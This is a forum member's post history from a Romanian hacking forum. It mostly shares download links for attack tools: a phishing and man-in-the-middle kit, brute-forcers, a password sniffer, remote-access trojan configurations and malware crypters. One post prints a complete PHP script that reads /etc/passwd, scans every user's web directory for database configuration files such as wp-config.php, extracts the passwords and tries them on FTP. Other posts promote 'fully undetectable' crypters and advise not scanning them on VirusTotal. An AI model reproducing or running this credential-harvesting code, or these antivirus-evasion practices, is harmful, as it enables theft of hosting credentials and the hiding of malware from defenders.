
io.kent
Active Members-
Posts
2325 -
Joined
-
Last visited
-
Days Won
21
Everything posted by io.kent
-
actualizat..23/09/2012
-
afumat, cred ca nici nu sti sa-l deschizii, si explicii aici ca ai dat 1000, nu stiu dar nu te cred, am o presimtire foarte aiurea.. mai bine ma abtin! edit// Hai steaua..
-
Features DDoS Find a website's IP Port Scanning Requirement : Python v2.7 or higher Download Dequiem2.0(Test) Download Dequiem from SourceForge.net
-
Penetration ARP Cache Poisoning Ghost Phisher is a Wireless and Ethernet security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to emulate access points and deploy various internal networking servers for networking, penetration testing and phishing attacks. Operating System Supported The Software runs on any Linux mahine with the programs prerequisites, But the program has been tested on the following Linux based Operating Systems: Ubuntu KDE/GNOME BackTrack Linux BackBox Linux Prerequisites The Program requires the following to run properly: The following dependencies can be installed using the Debian package installer command on debian based systems using "apt-get install program" or otherwise downloaded and installed manually Aircrack-NG Python-Scapy Python Qt4 Python Subversion Xterm Metasploit Framework (Optional) Features Ghost Phisher currently supports the following features: HTTP Server Inbuilt RFC 1035 DNS Server Inbuilt RFC 2131 DHCP Server Webpage Hosting and Credential Logger (Phishing) Wifi Access point Emulator Session Hijacking (Passive and Ethernet Modes) ARP Cache Poisoning (MITM and DOS Attacks) Penetration using Metasploit Bindings Automatic credential logging using SQlite Database Update Support download : https://code.google.com/p/ghost-phisher/downloads/list
- 1 reply
-
- 1
-
-
Patator v0.4 Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Currently it supports the following modules: * ftp_login : Brute-force FTP * ssh_login : Brute-force SSH * telnet_login : Brute-force Telnet * smtp_login : Brute-force SMTP * smtp_vrfy : Enumerate valid users using the SMTP VRFY command * smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command * finger_lookup : Enumerate valid users using Finger * http_fuzz : Brute-force HTTP/HTTPS * pop_passd : Brute-force poppassd (not POP3) * ldap_login : Brute-force LDAP * smb_login : Brute-force SMB * smb_lookupsid : Brute-force SMB SID-lookup * mssql_login : Brute-force MSSQL * oracle_login : Brute-force Oracle * mysql_login : Brute-force MySQL * pgsql_login : Brute-force PostgreSQL * vnc_login : Brute-force VNC * dns_forward : Brute-force DNS * dns_reverse : Brute-force DNS (reverse lookup subnets) * snmp_login : Brute-force SNMPv1/2 and SNMPv3 * unzip_pass : Brute-force the password of encrypted ZIP files * keystore_pass : Brute-force the password of Java keystore files Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting. download : https://code.google.com/p/patator/downloads/list
-
Intercepter-NG v0.9.5 [intercepter-NG] offers the following features: + Sniffing passwords\hashes of the types: ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP \WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE\NTL M + Sniffing chat messages of: ICQ\AIM\JABBER\YAHOO\MSN\IRC\MRA + Reconstructing files from: HTTP\FTP\IMAP\POP3\SMTP\SMB + Promiscuous-mode\ARP\DHCP\Gateway\Smart Scanning + Capturing packets and post-capture (offline) analyzing\RAW Mode + Remote traffic capturing via RPCAP daemon + NAT\SOCKS\DHCP + ARP\DNS over ICMP\DHCP\SSL\SSLSTRIP\WPAD\SMBRelay MiTM\DNS Spoofing Works on Windows NT(2K\XP\2k3\Vista\7). Download : Intercepter-NG 0.9.5http://intercepter.nerf.ru/Intercepter-NG.v095.zip Intercepter-NG [Console Edition 0.4] http://sniff.su/Intercepter-NG.CE.04.zip + INfo: Intercepter-NG news : 18.09.2012 - Intercepter-NG v0.9.5 + Intercepter-NG [Console Edition] 0.4 Added: SSLStrip: Cookie Killer DNS Spoofing MRA MD5 Auth HTTP Auth Heur Multiselecting of captures Support of pcapng (new wireshark format) Expert Mode ARP Cage Updated: ARP Scan according to netmask RAW Mode Resurrection Mode (http proxy support) HTTP Injection SSL MiTM + SSLStrip Countless improvements and fixes --- manual control of arp poison in CE and some updates from win version, see CHANGELOG
-
This is a database scanner used to looking for file configuration (file that connects into database CMS application). <?php echo ***8220;<html>***8221;; echo ***8220;<title>[ Database Scanner]</title><body>***8221;; set_time_limit(0); ################## @$passwd=fopen(***8216;/etc/passwd***8217;,'r***8217;); if (!$passwd) { echo ***8220;[-] Error : Can***8217;t read /etc/passwd***8221;; exit; } $path_to_public=array(); $users=array(); $pathtoconf=array(); $i=0; while(!feof($passwd)) { $str=fgets($passwd); if ($i>35) { $pos=strpos($str,***8221;**8221;); $username=substr($str,0,$pos); $dirz=***8221;/home/$username/public_html/***8221;; if (($username!=***8221;")) { if (is_readable($dirz)) { array_push($users,$username); array_push($path_to_public,$dirz); } } } $i++; } ################### ######################### echo ***8220;<br><br>***8221;; echo ***8220;<textarea name=***8217;main_window***8217; cols=100 rows=20>***8221;; echo ***8220;[+] Founded ***8220;.sizeof($users).***8221; entrys in /etc/passwd\n***8221;; echo ***8220;[+] Founded ***8220;.sizeof($path_to_public).***8221; readable public_html directories\n***8221;; echo ***8220;[~] Searching for passwords in config.* files***8230;\n\n***8221;; foreach ($users as $user) { $path=***8221;/home/$user/public_html/***8221;; read_dir($path,$user); } echo ***8220;\n[+] Done\n***8221;; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath=***8221;$path$file***8221;; if (($file!=***8217;.') and ($file!=***8217;..***8217;)) { if (is_readable($fpath)) { $dr=***8221;$fpath/***8221;; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file==***8217;config.php***8217;) or ($file==***8217;header.inc.php***8217;) or ($file==***8217;content.inc.php***8217;) or ($file==***8217;mainfile.php***8217;) or ($file==***8217;utils.inc.php***8217;) or ($file==***8217;main.php***8217;) or ($file==***8217;config.inc.php***8217;) or ($file==***8217;db.inc.php***8217;) or ($file==***8217;connect.php***8217;) or ($file==***8217;wp-config.php***8217;) or ($file==***8217;var.php***8217;) or ($file==***8217;configure.php***8217;) or ($file==***8217;configuration.php***8217;) or ($file==***8217;configurations.php***8217;) or ($file==***8217;configs.php***8217;) or ($file==***8217;config.locale.php***8217;) or ($file==***8217;db.inc.php***8217;) or ($file==***8217;dbconnect.inc.php***8217;) or ($file==***8217;dbconnection.php***8217;) or ($file==***8217;var.php***8217;) or ($file==***8217;mysql.php***8217;) or ($file==***8217;global.inc.php***8217;) or ($file==***8217;database.php***8217;) or ($file==***8217;dbconnect.php***8217;) or ($file==***8217;conf.php***8217;) or ($file==***8217;configDB.inc.php***8217;) or ($file==***8217;db.php***8217;) or ($file==***8217;db_connect.php***8217;)) { $pass=get_pass($fpath); if ($pass!=***8221;) { echo ***8220;[+] $fpath\n$pass\n***8221;; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config=fopen($link,***8217;r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,***8217;pass***8217;) or strstr($line,***8217;password***8217;) or strstr($line,***8217;passwd***8217;)) { if (strrpos($line,***8217;***8221;***8216;)) $pass=substr($line,(strpos($line,***8217;=')+3),(strrpos($line,***8217;***8221;***8216;)-(strpos($line,***8217;=')+3))); else $pass=substr($line,(strpos($line,***8217;=')+3),(strrpos($line,***8221;***8216;***8221;)-(strpos($line,***8217;=')+3))); return $pass; } } } function ftp_check($login,$pass) { @$ftp=ftp_connect(***8217;127.0.0.1***8242;); if ($ftp) { @$res=ftp_login($ftp,$login,$pass); if ($res) { echo ***8216;[FTP] ***8216;.$login.***8217;**8217;.$pass.***8221; Success\n***8221;; } else ftp_quit($ftp); } } echo ***8220;</textarea><br>***8221;; echo ***8220;</body></html>***8221;; ?>
-
foarte frumos nytro, chiar recomand membrilor sa arunce o privire ca au multe de invatat.
-
The Tip is for the following firms and tried it on several Stubs, Kaspersky: Packed.Win32.Krap.b McAfee: Malware.bj download : PE_Labz.rar
-
SpyNet 2.6 [Configuracion] Bifrost 1.2d [Configuracion] Poison Ivy 2.3.2 [Configuracion] CyberGate [Configuracion] Bandook [Configuracion] Apocalypse [Configuracion] SS-RAT 0.7 [Configuracion] CyberGate 1.04.8 [Configuracion]
-
http://www.youtube.com/watch?feature=player_embedded&v=DsjM7uItwsU Pagina Oficial: http://xyat-rat.e-monsite.com/
-
scan novirusthanks : Report date: 2012-09-23 17:43:27 (GMT 1) File name: stub-exe File size: 89420 bytes MD5 hash: 3108a0b2c3154df4c1813eb55052b643 SHA1 hash: 45785259e55d5e7559f3ca0c3b37528069b6ee0f Detection rate: 1 on 14 (7%) Status: INFECTED Asquared 17:43:27 5.1.0.3 Avast 17:43:27 5.0 AVG 17:43:27 10.0.0.1190 Avira 17:43:27 7.11.7.12 BitDefender 17:43:27 7.0.0.2555 ClamAV 17:43:27 0.97.4 Comodo 17:43:27 1.0 DrWeb 17:43:27 5.0.2 Fprot 17:43:27 6.0 IkarusT3 17:43:27 T31001097 Panda 17:43:27 10.0.3.0 STOPZilla 17:43:27 5.0.0.0 TrendMicro 17:43:27 9.200.0.1012 PAK_Generic.006 VBA32 17:43:27 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org Report date: 2012-09-23 17:45:18 (GMT 1) File name: cliente-www-masters-hackers-v- File size: 286720 bytes MD5 hash: ed9089a1f60c536f589d672dfe852c55 SHA1 hash: c7cb7b36ca85c06b939765a3f3b1ff3e401f213a Detection rate: 1 on 14 (7%) Status: INFECTED Asquared 17:45:18 5.1.0.3 Avast 17:45:18 5.0 AVG 17:45:18 10.0.0.1190 Avira 17:45:18 7.11.7.12 BitDefender 17:45:18 7.0.0.2555 ClamAV 17:45:18 0.97.4 Comodo 17:45:18 1.0 DrWeb 17:45:18 5.0.2 Fprot 17:45:18 6.0 IkarusT3 17:45:18 T31001097 Panda 17:45:18 10.0.3.0 STOPZilla 17:45:18 5.0.0.0 TrendMicro 17:45:18 9.200.0.1012 VBA32 17:45:18 3.12.0.300 Malware-Cryptor.VB.gen.2 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org download : Download CRYPTER MH.rar from Sendspace.com - send big files the easy way parola : para todo el que agradesca
-
It was released on DVD recently held Defcon 20 in Las Vegas. The DVD contains a lot of material, including presentations of exhibitions, photographs, Ebooks, Videos, Tools, extras and more, I leave here the list of directories and files that comes with the DVD: download : https://media.defcon.org/dc-20/defcon-20-dvd-original.rar sursa: blackploit.com
-
This program is a powerful anti-spyware with which we can properly protect all types of malware. SuperAntiSpyware detects and removes all types of spyware, trojans and adware from up dialers and suspicious cookies. Their analyzes are characterized by fast and that scan While the entire PC including memory and register. SUPERAntiSpyware Pro-Con, you can keep your PC safe with real-time protection. , automatic updates. , and many benefits offered by the PRO version. Bracket: XP/VISTA/7 Language : Multi (Incl. Spanish) Version: 05/05/1012 Download file SUPERAntiSpyware_Pro_5.rar
-
aici va las niste tutoriale superbe... This class will immerse the student into an interactive environment where you will be shown how to scan, test, hack and secure their own systems. The lab intensive environment gives each student in-depth knowledge and practical experience with the current essential security systems. Students will begin by understanding how perimeter defenses work and then lead into scanning and attacking their own networks, no real network is harmed. Here, students learn how intruders escalate privileges and what steps can be taken to secure a system. Students also learn about Intrusion Detection, Policy Creation, Social Engineering, DDoS Attacks, Buffer Overflows and Virus Creation. When a student leaves this intensive 5 day class will have hands on understanding and experience in Ethical Hacking. This course prepares you for EC-Council Certified Ethical Hacker exam 312-50 The latest certified ethical hacker (CEH) courses is about to be released and presented for the first time in U.S. hacker arrested in June 2008. Many small details of CEH Version 6 have been peppered on the Internet, as well as fragments of claim copy of the EC and the Council's own website. "With a total of 28 new and never seen before modules, covering the latest concepts with more real-life cases, and show the latest hacking and security tools, the Certified Ethical Hacker (Version 6) will increasingly advanced course. " So I requested an interview with the EC and the Council for see if we can get confirmation and clarification. The questions are compiled from my own list as well as some others that were suggested by readers of The Ethical Hacker Network (EH-Net). EC and the Council responded in a very timely manner with answers from both Haja Mohideen, co-founder of the EC and the Council, and Chuck Swanson, the instructor scheduled to teach the first v6 offering the course. curriculum consists of CEHv6 instructor-led training and self-study. The instructor will provide the details of self-study modules to the students from the class. Module 1: Introduction to Ethical Hacking Module 2: Hacking Laws Module 3: Footprinting Module 4: Google Hacking Module 5: Scanning Module 6: Enumeration Module 7: System Hacking Module 8: Trojans and rear Module 9: Viruses and Worms Module 10: Sniffers Module 11: Social Engineering Module 12: Phishing Module 13: Hacking Email Accounts Module 14: Denial of Service Module 15: Session Hijacking Module 16: Hacking Web Servers Module 17: Web Application Vulnerabilities Module 18: Web-Based Password Cracking Techniques Module 19: SQL Injection Module 20: Hacking Wireless Networks Module 21: Physical Security Module 22: Linux Hacking Module 23: Evading IDS, Firewalls and detection of Honey Pots Module 24: Buffer Overflow Module 25: Cryptography Module 26: Penetration Testing Module 27: Covert Hacking Module 28: Writing Virus Codes Module 29: Assembly Language Tutorial Module 30: Exploit Writing Module 31: Smashing the Stack for Fun and Profit Module 32: Windows based buffer overflow exploit Writing Module 33: Reverse Engineering Module 34: MAC OS X Hacking Module 35: Hacking Routers, Cable Modems and Firewalls Module 36: Hacking Mobile Phones, PDA and Handheld Devices Module 37: Bluetooth Hacking Module 38: VoIP Hacking Module 39: RFID Hacking Module 40: Spamming Module 41: Hacking USB Devices Module 42: Hacking Database Servers Module 43: Cyber-War Hacking, Al-Qaida and Terrorism Module 44: Techniques of Internet content filtering Module 45: Privacy on the Internet Module 46: Getting laptops Module 47: Spying Technologies Module 48: Corporate espionage Use Executives-Hacking Module 49: Creating Security Policies Module 50: Software Piracy and Warez Module 51: Hacking and cheating online Games Module 52: Hacking RSS and Atom Module 53: Hacking browsers (Firefox, IE) Module 54: Proxy Server Technologies Module 55: Prevention Data Loss Module 56: Hacking Global Positioning System (GPS) Module 57: Computer Forensics and Incident Handling Module 58: Credit Card Fraud Module 59: How to Steal Passwords Module 60: Firewall Technologies Module 61: Threats and Countermeasures Module 62: Case Studies Module 63: Botnets Module 64: Economic Espionage Module 65: Patch Management Module 66: Security Convergence Module 67: Identifying the Terrorist Video Tutorial Parte 1 DepositFiles Partea 2 DepositFiles Partea 3 DepositFiles Partea 4 DepositFiles Partea 5 DepositFiles Partea 6 DepositFiles Partea 7 DepositFiles Partea 8 DepositFiles Partea 9 DepositFiles Partea 10 DepositFiles Partea 11 DepositFiles Partea 12 DepositFiles Partea 13 DepositFiles Partea 14 DepositFiles Partea 15 DepositFiles Partea 16 DepositFiles Partea 17 DepositFiles Cartii parte 1 DepositFiles partea 2 DepositFiles partea 3 DepositFiles Video Tutorial Hotfile.com: 1-CLICK Dateihoster Cartii Hotfile.com: 1-CLICK Dateihoster
-
Connection via XMPP protocol - Posts emerging at server startup - Password Protection Server - File Transfer in band or out of band - Multiple improvements and optimizations. - Correction of errors - several other features Screenshots download : Demonio - Browse Files at SourceForge.net sursa : albertinux.com
-
Cyb3rjunk13 & Packers Crypters Toolkit v3 is a set of 457 utilities: Crypters, binders, packers, unpackers, decompilers and debugging tools, namely: - Crypters and Binders (116 files) - Decrypters and Unpackers (159 files) - Packers and Binders ( 86 files) - Debuggers (84 files) - Decompilers (12 files) These include the following tools: al3ks_crypter, Yoda's Crypter, Themida, Xtreme Protector, Neolite 2, Icon Changer, File Binder, Morphine, UPX Crypt, ACRebuilder, Dump FX , Morphine Killer, Unpack UPX, Visual Basic Decompiler Pack, VD Debug, SoftIce among others. Download: rar http://www.airdemon.net/Crypters_Packers.rar iso: http://www.airdemon.net/Crypters_Packers.iso
-
pana mea mam grabit sa-l termin, si aiurea, graba strica treaba, am sa ma uit, dece nu se deschide,
-
si acest crypter este fara parola, in schimb acum fac unu tare de tot, sper sa-l termin azi,.. download 2012 Crypter.exe sa nu-l scanati pe virustotal.. scan: NovirusThanks : Report date: 2012-09-21 15:08:22 (GMT 1) File name: 2012-crypter-exe File size: 1228800 bytes MD5 hash: 6e7dfb9c2edeccf5f20e6ce5cf91c9d7 SHA1 hash: 851bd268c72f979634eb335d914a8607a197a29d Detection rate: 0 on 14 (0%) Status: CLEAN Asquared 15:08:23 5.1.0.3 Avast 15:08:23 5.0 AVG 15:08:23 10.0.0.1190 Avira 15:08:23 7.11.7.12 BitDefender 15:08:23 7.0.0.2555 ClamAV 15:08:23 0.97.4 Comodo 15:08:23 1.0 DrWeb 15:08:23 5.0.2 Fprot 15:08:23 6.0 IkarusT3 15:08:23 T31001097 Panda 15:08:23 10.0.3.0 STOPZilla 15:08:23 5.0.0.0 TrendMicro 15:08:23 9.200.0.1012 VBA32 15:08:23 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org
-
vip22, nu critica, ca si alti membri au nevoie de cate un crypter, si daca nu stiu sa decrypteze, ce sanse au? trebuie sa le acordam o mana de ajutor, in schimb ai o gramada de cryptere, stai linistit si cu ochii in 4 ca sigur azi vin cateva cryptere fud 100%..!
-
pfff, azi e ziua mea! 20/09/1977 numi vine sa cred:((
-
Tex de cat sa-ti pui mentalitatea, cu cineva lovit de golanie:) mai bine savurezi o cafea la un film sf!
-
ca sa stitii si voi acest crypter al am de ceva timp bun, si al si folosesc, si lam scanat pe novirusthanks, si tot e fud! asa ca numai spunetii sa nu se scaneze cryptere pe novirusthanks. Report date: 2012-09-19 23:29:02 (GMT 1) File name: saddam-crypter-exe File size: 1353728 bytes MD5 hash: 7b88c4cab5481b5127ae30bc5522735c SHA1 hash: 58f3bd90d02b2ebb654b9da26e51ab778858fc31 Detection rate: 0 on 14 (0%) Status: CLEAN
-
pukamvp sa-ti explic putin, dupa aia trage o concluzie, am un crypter, scanat de 5 luni, deja pe novirusthanks, crypterul ce-l folosesc eu, si acum este fud 100% , ce sfat? daca nu as vedea cu ochii mei nu as comenta, dar asa, stiu, bine treaba asta..
-
fratilor a disparut linkul, niciodata nam mai vazut asa ceva in viata mea rad de unu singur.. incredibil, acum ma uit iara dupa link.. aici e linkul.. http://www.sendspace.com/file/1zcb4u